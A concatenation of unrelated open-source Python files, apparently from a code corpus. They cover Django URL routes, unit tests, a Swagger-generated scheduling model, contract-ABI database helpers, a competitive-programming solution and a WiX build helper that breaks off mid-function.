        ``(momentum_ref, circulation_ref)``, plus ``scalar_potential_ref``
        when *return_scalar_ref* is True.
    """
    neumann_bc = make_boundary(circulation)
    potential = laplace_3d_dct_fd(mesh, neumann_bc)
    circulation_reference = vc.gradient(potential, mesh=mesh)
    momentum_reference = devore_invert_curl(mesh, circulation_reference)
    if return_scalar_ref:
        return momentum_reference, circulation_reference, potential
    return momentum_reference, circulation_reference
def make_boundary(field):
    r"""
    Build the boundary-condition array for the circulation reference.

    The six faces of the volume are filled with the negated normal component
    of *field*, so that
    :math:`-\vec{Circ}_{ref} \cdot \hat{n} = \vec{Circ} \cdot \hat{n}`.
    Interior points stay zero.  Assignment order matters at edges/corners:
    later face assignments overwrite earlier ones.
    """
    fx, fy, fz = field
    bc = np.zeros(fx.shape)
    # Faces normal to axis 1 carry -f_x, axis 0 faces carry -f_y,
    # axis 2 faces carry -f_z (same convention as the original).
    bc[:, 0, :] = -fx[:, 0, :]
    bc[:, -1, :] = -fx[:, -1, :]
    bc[0, :, :] = -fy[0, :, :]
    bc[-1, :, :] = -fy[-1, :, :]
    bc[:, :, 0] = -fz[:, :, 0]
    bc[:, :, -1] = -fz[:, :, -1]
    return bc
| StarcoderdataPython |
3345947 | from django.conf.urls import patterns, include, url
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from issues.views import *
# Issue-tracker URL routes.
# NOTE(review): patterns() and string view references were removed in
# Django 1.10 — migrate to a plain list of url()/path() entries when upgrading.
urlpatterns = patterns("issues.views",
    (r"^delete-comment/(\d+)/$", "delete_comment", {}, "delete_comment"),
    (r"^update-issue/(\d+)/(delete)/$", "update_issue", {}, "update_issue"),
    (r"^update-issue/(\d+)/(closed|progress)/(on|off|\d+)/$", "update_issue", {}, "update_issue"),
    (r"^update-issue-detail/(?P<mfpk>\d+)/$", staff_member_required(UpdateIssue.as_view()), {}, "update_issue_detail"),
    (r"^reports/$", staff_member_required(ReportList.as_view()), {}, "reports"),
    (r"^create-issue/$", staff_member_required(CreateIssue.as_view()), {}, "create_issue"),
    (r"^create-report/$", staff_member_required(CreateReport.as_view()), {}, "create_report"),
    (r"^update-report/(?P<mfpk>\d+)/$", staff_member_required(UpdateReport.as_view()), {}, "update_report"),
    (r"^duplicate-report/(?P<dpk>\d+)/$", staff_member_required(DuplicateReport.as_view()), {}, "duplicate_report"),
    (r"^issue/(?P<dpk>\d+)/$", staff_member_required(ViewIssue.as_view()), {}, "issue"),
    (r"^attachments/(?P<dpk>\d+)/$", staff_member_required(AttachmentsView.as_view()), {}, "attachments"),
    # (r"^attachments/(?P<dpk>\d+)/$", staff_member_required(attachments_view), {}, "attachments"),
    (r"^update-comment/(?P<mfpk>\d+)/$", staff_member_required(UpdateComment.as_view()), {}, "update_comment"),
    (r"^add-issues/$", staff_member_required(AddIssues.as_view()), {}, "add_issues"),
    (r"^report/(?P<dpk>\d+)/$", staff_member_required(ReportView.as_view()), {}, "report"),
)
| StarcoderdataPython |
4800958 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding=utf-8 -*-
from __future__ import print_function
# from __future__ import absolute_import
import os
import sys
if not os.path.abspath("../") in sys.path:
sys.path.append(os.path.abspath("../"))
try:
from unittest import mock
except ImportError:
import mock
import unittest
import numpy as np
import tensorflow as tf
from utils.utils import make_unique_section_file
from utils.utils import get_padding_num
from utils.utils import timer_wrapper
from yolo.yolo_utils import select_boxes_by_classes_prob
from yolo.yolo_utils import non_max_suppression
from yolo.yolo_utils import read_classes_names
class TestUtiils(unittest.TestCase):
    """Tests for utils.utils helpers.

    NOTE(review): the class name looks like a typo for "TestUtils"; left
    unchanged so external references keep working (unittest discovers it by
    the Test prefix regardless).
    """
    # def test_get_padding_num_one_dim(self):
    #     input_shape = [10,13]
    #     kernel_size = [3,3]
    #     stride = 2
    #     self.assertTrue(
    #         (get_padding_num(input_shape, kernel_size, stride) == \
    #         np.array([[1., 2.], [1., 2.]])).all())
    def test_timer_wrapper(self):
        """A timer_wrapper-decorated function must still run to completion."""
        @timer_wrapper
        def func():
            for i in range(1000):
                x = i * i
        func()
class TestYOLOUtils(unittest.TestCase):
    """Tests for yolo.yolo_utils helpers."""
    # def test_select_boxes_by_classes_prob(self):
    #     box_confidences = tf.random_normal([3,3,2])
    #     class_probs = tf.random_normal([3,3,5])
    #     boxes = tf.random_normal([3,3,2,4])
    #     print(select_boxes_by_classes_prob(box_confidences, class_probs, boxes))
    # def test_non_max_suppression(self):
    #     box_confidences = tf.random_normal([3,3,2])
    #     class_probs = tf.random_normal([3,3,5])
    #     boxes = tf.random_normal([3,3,2,4])
    #     class_scores,boxes,classes = select_boxes_by_classes_prob(box_confidences, class_probs, boxes)
    #     print(non_max_suppression(class_scores, boxes, classes))
    def test_read_classes_names_voc(self):
        """The VOC names file must parse into the 20 canonical class names."""
        # NOTE(review): path is relative to the working directory — assumes the
        # suite is run from the tests directory; confirm in CI configuration.
        file_path = '../data/voc.names'
        names = read_classes_names(file_path)
        self.assertEqual(
            ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'],
            names)
if "__main__" == __name__:
unittest.main() | StarcoderdataPython |
4943269 | <reponame>fBloc/bloc-client-python<filename>bloc_py_tryout/math_calcu_test.py<gh_stars>0
import unittest
from bloc_client import *
from bloc_py_tryout.math_calcu import MathCalcu
class TestMathCalcuNode(unittest.TestCase):
    """Unit tests for the MathCalcu bloc function."""

    def setUp(self):
        # A client with an empty server address is enough for local test runs.
        self.client = BlocClient.new_client("")

    def test_add(self):
        """Running MathCalcu on [1, 2] with the "+" operator must succeed and yield 3."""
        opt = self.client.test_run_function(
            MathCalcu(),
            [
                [  # ipt 0
                    [1, 2]  # component 0, numbers
                ],
                [  # ipt 1
                    1  # "+" operator
                ],
            ]
        )
        # assertIsInstance replaces the former redundant bare `assert isinstance(...)`
        # so a type mismatch is reported through unittest instead of a raw AssertionError.
        self.assertIsInstance(opt, FunctionRunOpt, "opt is not FunctionRunOpt type")
        self.assertTrue(opt.suc, "should suc")
        self.assertFalse(opt.intercept_below_function_run,
                         "should not intercept below function run")
        self.assertEqual(opt.optKey_map_data['result'], 3, "result should be 3")
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| StarcoderdataPython |
9773420 | from errors import CustomListSumException
from tests.customlist_tests.base.customlist_test_base import CustomListTestBase
class CustomListSumTests(CustomListTestBase):
    """Behavioural tests for CustomList.sum(): empty, numeric, mixed, invalid."""

    def test_customListSum_whenEmptyList_shouldReturn0(self):
        custom_list = self.setup_list()
        result = custom_list.sum()
        self.assertEqual(0, result)

    def test_customListSum_whenMultipleNumbers_shouldReturnTheirSum(self):
        custom_list = self.setup_list(1, 2)
        result = custom_list.sum()
        self.assertEqual(3, result)

    def test_customListSum_whenNumbersAndLenObjects_shouldReturnTheirSum(self):
        # Per this expectation, sized objects contribute their len(): 1 + 2 + len('123') == 6.
        custom_list = self.setup_list(1, 2, '123')
        result = custom_list.sum()
        self.assertEqual(6, result)

    def test_customListSum_whenInvalidObjects_shouldRaise(self):
        # Objects that are neither numeric nor sized must raise CustomListSumException.
        custom_list = self.setup_list(1, 2, '123', object())
        with self.assertRaises(CustomListSumException) as context:
            custom_list.sum()
        self.assertIsNotNone(context.exception)
9749158 | <reponame>billyio/atcoder<gh_stars>1-10
# https://drken1215.hatenablog.com/entry/2020/10/11/211000
MOD = 10 ** 9 + 7


def count_sequences(n):
    """Return dp[n] mod 1e9+7, where dp[0] = 1 and, for i >= 2,
    dp[i] = dp[0] + dp[1] + ... + dp[i-3] (an empty sum when i < 3).

    Keeps a running prefix sum instead of the original O(n^2) double loop,
    and applies the modulus as it goes so intermediate integers stay small.
    """
    if n == 1:
        return 0
    dp = [0] * (n + 1)
    dp[0] = 1
    prefix = 0  # sum of dp[0..i-3] (mod MOD) for the current i
    for i in range(2, n + 1):
        if i >= 3:
            prefix = (prefix + dp[i - 3]) % MOD
        dp[i] = prefix
    return dp[n] % MOD


if __name__ == "__main__":
    # Same I/O contract as before: read N from stdin, print the answer
    # (0 for N == 1).
    print(count_sequences(int(input())))
301948 | <filename>src/ctc/db/schemas/contract_abis/contract_abis_statements.py
from __future__ import annotations
import json
import typing
import toolsql
from ctc import spec
from ... import schema_utils
async def async_upsert_contract_abi(
    address: spec.Address,
    abi: spec.ContractABI,
    includes_proxy: bool,
    conn: toolsql.SAConnection,
    network: spec.NetworkReference | None = None,
) -> None:
    """Insert or update the ABI stored for ``address`` on ``network``.

    The address is lowercased for use as the row key and the ABI is stored
    as JSON text; an existing row is overwritten (upsert).
    """
    row = {
        'address': address.lower(),
        'abi_text': json.dumps(abi),
        'includes_proxy': includes_proxy,
    }
    toolsql.insert(
        conn=conn,
        table=schema_utils.get_table_name('contract_abis', network=network),
        row=row,
        upsert='do_update',
    )
async def async_select_contract_abi(
    address: spec.Address,
    network: spec.NetworkReference | None = None,
    *,
    conn: toolsql.SAConnection,
) -> spec.ContractABI | None:
    """Fetch the stored ABI for ``address`` on ``network``, or None if absent."""
    table_name = schema_utils.get_table_name('contract_abis', network=network)
    raw_abi = toolsql.select(
        conn=conn,
        table=table_name,
        row_id=address.lower(),
        return_count='one',
        only_columns=['abi_text'],
        row_format='only_column',
    )
    return None if raw_abi is None else json.loads(raw_abi)
async def async_select_contract_abis(
    network: spec.NetworkReference | None = None,
    *,
    conn: toolsql.SAConnection,
) -> typing.Mapping[spec.Address, spec.ContractABI]:
    """Load every stored contract ABI for ``network``, keyed by address."""
    table_name = schema_utils.get_table_name('contract_abis', network=network)
    rows = toolsql.select(conn=conn, table=table_name)
    return {row['address']: json.loads(row['abi_text']) for row in rows}
async def async_delete_contract_abi(
    conn: toolsql.SAConnection,
    address: spec.Address,
    network: spec.NetworkReference | None = None,
) -> None:
    """Remove the stored ABI row for ``address`` on ``network`` (no-op if absent)."""
    table_name = schema_utils.get_table_name('contract_abis', network=network)
    toolsql.delete(conn=conn, table=table_name, row_id=address.lower())
| StarcoderdataPython |
8116274 | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class WorkPlanShift(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
WorkPlanShift - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'str',
'days': 'SetWrapperDayOfWeek',
'flexible_start_time': 'bool',
'exact_start_time_minutes_from_midnight': 'int',
'earliest_start_time_minutes_from_midnight': 'int',
'latest_start_time_minutes_from_midnight': 'int',
'constrain_stop_time': 'bool',
'constrain_latest_stop_time': 'bool',
'latest_stop_time_minutes_from_midnight': 'int',
'constrain_earliest_stop_time': 'bool',
'earliest_stop_time_minutes_from_midnight': 'int',
'start_increment_minutes': 'int',
'flexible_paid_time': 'bool',
'exact_paid_time_minutes': 'int',
'minimum_paid_time_minutes': 'int',
'maximum_paid_time_minutes': 'int',
'constrain_contiguous_work_time': 'bool',
'minimum_contiguous_work_time_minutes': 'int',
'maximum_contiguous_work_time_minutes': 'int',
'activities': 'list[WorkPlanActivity]',
'id': 'str',
'delete': 'bool'
}
self.attribute_map = {
'name': 'name',
'days': 'days',
'flexible_start_time': 'flexibleStartTime',
'exact_start_time_minutes_from_midnight': 'exactStartTimeMinutesFromMidnight',
'earliest_start_time_minutes_from_midnight': 'earliestStartTimeMinutesFromMidnight',
'latest_start_time_minutes_from_midnight': 'latestStartTimeMinutesFromMidnight',
'constrain_stop_time': 'constrainStopTime',
'constrain_latest_stop_time': 'constrainLatestStopTime',
'latest_stop_time_minutes_from_midnight': 'latestStopTimeMinutesFromMidnight',
'constrain_earliest_stop_time': 'constrainEarliestStopTime',
'earliest_stop_time_minutes_from_midnight': 'earliestStopTimeMinutesFromMidnight',
'start_increment_minutes': 'startIncrementMinutes',
'flexible_paid_time': 'flexiblePaidTime',
'exact_paid_time_minutes': 'exactPaidTimeMinutes',
'minimum_paid_time_minutes': 'minimumPaidTimeMinutes',
'maximum_paid_time_minutes': 'maximumPaidTimeMinutes',
'constrain_contiguous_work_time': 'constrainContiguousWorkTime',
'minimum_contiguous_work_time_minutes': 'minimumContiguousWorkTimeMinutes',
'maximum_contiguous_work_time_minutes': 'maximumContiguousWorkTimeMinutes',
'activities': 'activities',
'id': 'id',
'delete': 'delete'
}
self._name = None
self._days = None
self._flexible_start_time = None
self._exact_start_time_minutes_from_midnight = None
self._earliest_start_time_minutes_from_midnight = None
self._latest_start_time_minutes_from_midnight = None
self._constrain_stop_time = None
self._constrain_latest_stop_time = None
self._latest_stop_time_minutes_from_midnight = None
self._constrain_earliest_stop_time = None
self._earliest_stop_time_minutes_from_midnight = None
self._start_increment_minutes = None
self._flexible_paid_time = None
self._exact_paid_time_minutes = None
self._minimum_paid_time_minutes = None
self._maximum_paid_time_minutes = None
self._constrain_contiguous_work_time = None
self._minimum_contiguous_work_time_minutes = None
self._maximum_contiguous_work_time_minutes = None
self._activities = None
self._id = None
self._delete = None
@property
def name(self):
"""
Gets the name of this WorkPlanShift.
Name of the shift
:return: The name of this WorkPlanShift.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this WorkPlanShift.
Name of the shift
:param name: The name of this WorkPlanShift.
:type: str
"""
self._name = name
@property
def days(self):
"""
Gets the days of this WorkPlanShift.
Days of the week applicable for this shift
:return: The days of this WorkPlanShift.
:rtype: SetWrapperDayOfWeek
"""
return self._days
@days.setter
def days(self, days):
"""
Sets the days of this WorkPlanShift.
Days of the week applicable for this shift
:param days: The days of this WorkPlanShift.
:type: SetWrapperDayOfWeek
"""
self._days = days
@property
def flexible_start_time(self):
"""
Gets the flexible_start_time of this WorkPlanShift.
Whether the start time of the shift is flexible
:return: The flexible_start_time of this WorkPlanShift.
:rtype: bool
"""
return self._flexible_start_time
@flexible_start_time.setter
def flexible_start_time(self, flexible_start_time):
"""
Sets the flexible_start_time of this WorkPlanShift.
Whether the start time of the shift is flexible
:param flexible_start_time: The flexible_start_time of this WorkPlanShift.
:type: bool
"""
self._flexible_start_time = flexible_start_time
@property
def exact_start_time_minutes_from_midnight(self):
"""
Gets the exact_start_time_minutes_from_midnight of this WorkPlanShift.
Exact start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == false
:return: The exact_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._exact_start_time_minutes_from_midnight
@exact_start_time_minutes_from_midnight.setter
def exact_start_time_minutes_from_midnight(self, exact_start_time_minutes_from_midnight):
"""
Sets the exact_start_time_minutes_from_midnight of this WorkPlanShift.
Exact start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == false
:param exact_start_time_minutes_from_midnight: The exact_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._exact_start_time_minutes_from_midnight = exact_start_time_minutes_from_midnight
@property
def earliest_start_time_minutes_from_midnight(self):
"""
Gets the earliest_start_time_minutes_from_midnight of this WorkPlanShift.
Earliest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:return: The earliest_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._earliest_start_time_minutes_from_midnight
@earliest_start_time_minutes_from_midnight.setter
def earliest_start_time_minutes_from_midnight(self, earliest_start_time_minutes_from_midnight):
"""
Sets the earliest_start_time_minutes_from_midnight of this WorkPlanShift.
Earliest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:param earliest_start_time_minutes_from_midnight: The earliest_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._earliest_start_time_minutes_from_midnight = earliest_start_time_minutes_from_midnight
@property
def latest_start_time_minutes_from_midnight(self):
"""
Gets the latest_start_time_minutes_from_midnight of this WorkPlanShift.
Latest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:return: The latest_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._latest_start_time_minutes_from_midnight
@latest_start_time_minutes_from_midnight.setter
def latest_start_time_minutes_from_midnight(self, latest_start_time_minutes_from_midnight):
"""
Sets the latest_start_time_minutes_from_midnight of this WorkPlanShift.
Latest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:param latest_start_time_minutes_from_midnight: The latest_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._latest_start_time_minutes_from_midnight = latest_start_time_minutes_from_midnight
@property
def constrain_stop_time(self):
"""
Gets the constrain_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled. Deprecated, use constrainLatestStopTime instead
:return: The constrain_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_stop_time
@constrain_stop_time.setter
def constrain_stop_time(self, constrain_stop_time):
"""
Sets the constrain_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled. Deprecated, use constrainLatestStopTime instead
:param constrain_stop_time: The constrain_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_stop_time = constrain_stop_time
@property
def constrain_latest_stop_time(self):
"""
Gets the constrain_latest_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled
:return: The constrain_latest_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_latest_stop_time
@constrain_latest_stop_time.setter
def constrain_latest_stop_time(self, constrain_latest_stop_time):
"""
Sets the constrain_latest_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled
:param constrain_latest_stop_time: The constrain_latest_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_latest_stop_time = constrain_latest_stop_time
@property
def latest_stop_time_minutes_from_midnight(self):
"""
Gets the latest_stop_time_minutes_from_midnight of this WorkPlanShift.
Latest stop time of the shift defined as offset minutes from midnight. Used if constrainStopTime == true
:return: The latest_stop_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._latest_stop_time_minutes_from_midnight
@latest_stop_time_minutes_from_midnight.setter
def latest_stop_time_minutes_from_midnight(self, latest_stop_time_minutes_from_midnight):
"""
Sets the latest_stop_time_minutes_from_midnight of this WorkPlanShift.
Latest stop time of the shift defined as offset minutes from midnight. Used if constrainStopTime == true
:param latest_stop_time_minutes_from_midnight: The latest_stop_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._latest_stop_time_minutes_from_midnight = latest_stop_time_minutes_from_midnight
@property
def constrain_earliest_stop_time(self):
"""
Gets the constrain_earliest_stop_time of this WorkPlanShift.
Whether the earliest stop time constraint for the shift is enabled
:return: The constrain_earliest_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_earliest_stop_time
@constrain_earliest_stop_time.setter
def constrain_earliest_stop_time(self, constrain_earliest_stop_time):
"""
Sets the constrain_earliest_stop_time of this WorkPlanShift.
Whether the earliest stop time constraint for the shift is enabled
:param constrain_earliest_stop_time: The constrain_earliest_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_earliest_stop_time = constrain_earliest_stop_time
@property
def earliest_stop_time_minutes_from_midnight(self):
"""
Gets the earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
This is the earliest time a shift can end
:return: The earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._earliest_stop_time_minutes_from_midnight
@earliest_stop_time_minutes_from_midnight.setter
def earliest_stop_time_minutes_from_midnight(self, earliest_stop_time_minutes_from_midnight):
"""
Sets the earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
This is the earliest time a shift can end
:param earliest_stop_time_minutes_from_midnight: The earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._earliest_stop_time_minutes_from_midnight = earliest_stop_time_minutes_from_midnight
@property
def start_increment_minutes(self):
"""
Gets the start_increment_minutes of this WorkPlanShift.
Increment in offset minutes that would contribute to different possible start times for the shift. Used if flexibleStartTime == true
:return: The start_increment_minutes of this WorkPlanShift.
:rtype: int
"""
return self._start_increment_minutes
@start_increment_minutes.setter
def start_increment_minutes(self, start_increment_minutes):
"""
Sets the start_increment_minutes of this WorkPlanShift.
Increment in offset minutes that would contribute to different possible start times for the shift. Used if flexibleStartTime == true
:param start_increment_minutes: The start_increment_minutes of this WorkPlanShift.
:type: int
"""
self._start_increment_minutes = start_increment_minutes
@property
def flexible_paid_time(self):
"""
Gets the flexible_paid_time of this WorkPlanShift.
Whether the paid time setting for the shift is flexible
:return: The flexible_paid_time of this WorkPlanShift.
:rtype: bool
"""
return self._flexible_paid_time
@flexible_paid_time.setter
def flexible_paid_time(self, flexible_paid_time):
"""
Sets the flexible_paid_time of this WorkPlanShift.
Whether the paid time setting for the shift is flexible
:param flexible_paid_time: The flexible_paid_time of this WorkPlanShift.
:type: bool
"""
self._flexible_paid_time = flexible_paid_time
@property
def exact_paid_time_minutes(self):
"""
Gets the exact_paid_time_minutes of this WorkPlanShift.
Exact paid time in minutes configured for the shift. Used if flexiblePaidTime == false
:return: The exact_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._exact_paid_time_minutes
@exact_paid_time_minutes.setter
def exact_paid_time_minutes(self, exact_paid_time_minutes):
"""
Sets the exact_paid_time_minutes of this WorkPlanShift.
Exact paid time in minutes configured for the shift. Used if flexiblePaidTime == false
:param exact_paid_time_minutes: The exact_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._exact_paid_time_minutes = exact_paid_time_minutes
@property
def minimum_paid_time_minutes(self):
"""
Gets the minimum_paid_time_minutes of this WorkPlanShift.
Minimum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:return: The minimum_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._minimum_paid_time_minutes
@minimum_paid_time_minutes.setter
def minimum_paid_time_minutes(self, minimum_paid_time_minutes):
"""
Sets the minimum_paid_time_minutes of this WorkPlanShift.
Minimum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:param minimum_paid_time_minutes: The minimum_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._minimum_paid_time_minutes = minimum_paid_time_minutes
@property
def maximum_paid_time_minutes(self):
"""
Gets the maximum_paid_time_minutes of this WorkPlanShift.
Maximum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:return: The maximum_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._maximum_paid_time_minutes
@maximum_paid_time_minutes.setter
def maximum_paid_time_minutes(self, maximum_paid_time_minutes):
"""
Sets the maximum_paid_time_minutes of this WorkPlanShift.
Maximum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:param maximum_paid_time_minutes: The maximum_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._maximum_paid_time_minutes = maximum_paid_time_minutes
@property
def constrain_contiguous_work_time(self):
"""
Gets the constrain_contiguous_work_time of this WorkPlanShift.
Whether the contiguous time constraint for the shift is enabled
:return: The constrain_contiguous_work_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_contiguous_work_time
@constrain_contiguous_work_time.setter
def constrain_contiguous_work_time(self, constrain_contiguous_work_time):
"""
Sets the constrain_contiguous_work_time of this WorkPlanShift.
Whether the contiguous time constraint for the shift is enabled
:param constrain_contiguous_work_time: The constrain_contiguous_work_time of this WorkPlanShift.
:type: bool
"""
self._constrain_contiguous_work_time = constrain_contiguous_work_time
@property
def minimum_contiguous_work_time_minutes(self):
"""
Gets the minimum_contiguous_work_time_minutes of this WorkPlanShift.
Minimum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:return: The minimum_contiguous_work_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._minimum_contiguous_work_time_minutes
@minimum_contiguous_work_time_minutes.setter
def minimum_contiguous_work_time_minutes(self, minimum_contiguous_work_time_minutes):
"""
Sets the minimum_contiguous_work_time_minutes of this WorkPlanShift.
Minimum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:param minimum_contiguous_work_time_minutes: The minimum_contiguous_work_time_minutes of this WorkPlanShift.
:type: int
"""
self._minimum_contiguous_work_time_minutes = minimum_contiguous_work_time_minutes
@property
def maximum_contiguous_work_time_minutes(self):
"""
Gets the maximum_contiguous_work_time_minutes of this WorkPlanShift.
Maximum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:return: The maximum_contiguous_work_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._maximum_contiguous_work_time_minutes
@maximum_contiguous_work_time_minutes.setter
def maximum_contiguous_work_time_minutes(self, maximum_contiguous_work_time_minutes):
"""
Sets the maximum_contiguous_work_time_minutes of this WorkPlanShift.
Maximum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:param maximum_contiguous_work_time_minutes: The maximum_contiguous_work_time_minutes of this WorkPlanShift.
:type: int
"""
self._maximum_contiguous_work_time_minutes = maximum_contiguous_work_time_minutes
@property
def activities(self):
"""
Gets the activities of this WorkPlanShift.
Activities configured for this shift
:return: The activities of this WorkPlanShift.
:rtype: list[WorkPlanActivity]
"""
return self._activities
@activities.setter
def activities(self, activities):
"""
Sets the activities of this WorkPlanShift.
Activities configured for this shift
:param activities: The activities of this WorkPlanShift.
:type: list[WorkPlanActivity]
"""
self._activities = activities
@property
def id(self):
"""
Gets the id of this WorkPlanShift.
ID of the shift. This is required only for the case of updating an existing shift
:return: The id of this WorkPlanShift.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this WorkPlanShift.
ID of the shift. This is required only for the case of updating an existing shift
:param id: The id of this WorkPlanShift.
:type: str
"""
self._id = id
@property
def delete(self):
"""
Gets the delete of this WorkPlanShift.
If marked true for updating an existing shift, the shift will be permanently deleted
:return: The delete of this WorkPlanShift.
:rtype: bool
"""
return self._delete
@delete.setter
def delete(self, delete):
"""
Sets the delete of this WorkPlanShift.
If marked true for updating an existing shift, the shift will be permanently deleted
:param delete: The delete of this WorkPlanShift.
:type: bool
"""
self._delete = delete
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| StarcoderdataPython |
1964190 | <reponame>design-automation/video-generator
import glob
import os
def get_paths_by_typ(fdr_path, typ):
    """Return paths of files with extension *typ* directly inside *fdr_path*.

    Office lock/temp files (basenames starting with "~$") are excluded.

    :param fdr_path: folder to search (non-recursive)
    :param typ: file extension without the leading dot, e.g. "pptx"
    :return: list of matching file paths
    """
    # os.path.join instead of a hard-coded "\\" separator, so the function
    # also works on POSIX systems.
    pattern = os.path.join(fdr_path, "*.%s" % typ)
    paths = glob.glob(pattern)
    return [path for path in paths
            if not os.path.basename(path).startswith("~$")]
| StarcoderdataPython |
11260381 | import sys
import os
import os.path
import hashlib
import re
import errno
import itertools
import tempfile
import hashlib
import requests
from xml.etree import ElementTree
import xml.sax
from xml.sax.handler import ContentHandler
_this_dir = os.path.dirname(os.path.abspath(__file__))
prefs = { 'verbose': True }
def system(args, dirname=None):
    """Run an external command, raising CalledProcessError on failure.

    params
        args    : argv list, i.e. [command, arg1, arg2, ...]
        dirname : if set, execute the command within this directory
    """
    import subprocess
    import sys
    with open(os.devnull, "w") as nulfp:
        # Command output is shown only in verbose mode; stderr is merged
        # into stdout either way.
        # n.b. stderr=subprocess.STDOUT fails mysteriously
        out_stream = sys.stdout if prefs['verbose'] else nulfp
        subprocess.check_call(args, stdout=out_stream, stderr=subprocess.STDOUT,
                              shell=False, cwd=dirname)
def add_wix_to_path():
    """Ensure the WiX 3.11.1 toolset is installed (via NuGet) and on PATH."""
    wix_dir = 'WiX.3.11.1'
    install_root = os.path.join(_this_dir, 'CAD_Installs', wix_dir)
    if not os.path.isdir(install_root):
        # One-time install into CAD_Installs using the repo's nuget.exe.
        system([r'..\src\.nuget\nuget.exe', 'install', '-Version', '3.11.1', 'WiX'],
               os.path.join(_this_dir))
    os.environ['PATH'] = os.path.join(install_root, 'tools') + ';' + os.environ['PATH']
# http://bugs.python.org/issue8277
class CommentedTreeBuilder(ElementTree.XMLTreeBuilder):
    """XML tree builder that preserves comments as Comment nodes.

    Workaround for http://bugs.python.org/issue8277 (stock parser drops
    comments). NOTE(review): XMLTreeBuilder is a legacy alias removed in
    newer Python 3 releases — confirm interpreter version before upgrading.
    """

    def __init__(self, html=0, target=None):
        ElementTree.XMLTreeBuilder.__init__(self, html, target)
        # Route expat comment events into our handler.
        self._parser.CommentHandler = self.handle_comment

    def handle_comment(self, data):
